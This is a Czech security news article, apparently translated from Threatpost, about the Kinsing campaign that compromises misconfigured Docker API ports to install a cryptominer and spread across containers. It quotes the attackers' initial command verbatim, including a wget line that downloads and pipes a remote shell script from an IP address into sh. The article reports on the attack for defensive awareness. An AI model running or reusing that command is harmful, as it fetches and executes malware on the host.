Kinsing malware cílí na tisíce Docker portů za den

Technologie cloudové kontejnerizace Docker je pod palbou organizované, samovolně se šířící krypto kampaně zaměřené na nesprávně nakonfigurované otevřené Docker Daemon API porty.

Podle výzkumného pracovníka z AquaSecu, jsou v rámci kampaně každý den pozorovány tisíce pokusů o kompromitaci kontejnerů. Úsilí trvá měsíce. Od začátku roku však počet denních pokusů výrazně překročil to, co bylo vidět dříve. Věříme, že tyto útoky jsou řízeny aktéry s dostatečnými zdroji a infrastrukturou potřebnou k provádění a udržení těchto útoků, a že nejde o improvizované úsilí, napsal v analýze.

Vzorec útoku začíná tím, že útočníci identifikují nesprávně nakonfigurovaný Docker API port, který zůstal otevřen pro veřejný internet. Poté přistoupí k tomuto otevřenému portu a k němu připojené instanci Docker a kontejner Ubuntu. Kontejner vydá příkaz, který vyvolá Kinsing malware, který zase stáhne a spustí kryptominer.

V poslední fázi infekce se Kinsing pokouší dostat do jiných kontejnerů a hostitelů.

Při každém útoku se používá stejný počáteční příkaz: „/ bin / bash -c apt-get update && apt-get install -y wget cron; service cron start; wget -q -O – 142.44.191.122/d.sh | sh; ocas -f / dev / null. “

Tento příkaz aktualizuje balíček Docker, aby implementoval instalační program, který následně stáhne d.sh shell skript.

Podle analýzy provádí shell skript několik věcí: Zakáže bezpečnostní opatření a vymaže protokoly; zabíjí jakýkoli další malware nebo kryptominery a odstraní všechny soubory, které s nimi souvisejí; zabíjí všechny běžící konkurenční škodlivé kontejnery Docker a odstraní jejich obrázky; stáhne a spustí Kinsing malware; a používá funkci „crontab“ ke stažení a spuštění stejného původního skriptu jednou za minutu.

Kinsing Malware

Kinsing je linuxový binární systém založený na Golang, který používá několik knihoven Go. Tyto knihovny se používají k nastavení komunikace s příkazovým serverem (C2); monitoringu systému a procesů; a vytvoření diskové oblasti pro uchovávání dat. Je to hlavní funkce, která slouží jako spouštěč pro načtení skriptů a spuštění malwaru.

V případě současné kampaně se užitečná zatížení v další fázi skládají z kryptomineru a „spr.sh“ shell skriptu, který se používá k postrannímu šíření Kinsingu v kontejnerové síti.

Stejně jako mnoho jiných minerů se připojuje k hostiteli pomocí žádosti o přihlášení přes HTTP, přijímá další pokyny a začíná těžit kryptoměnu.

Zajímavým aspektem útoku je shell skript používaný pro vlastní propagaci.

Zdroj: threatpost.com

Napsat komentář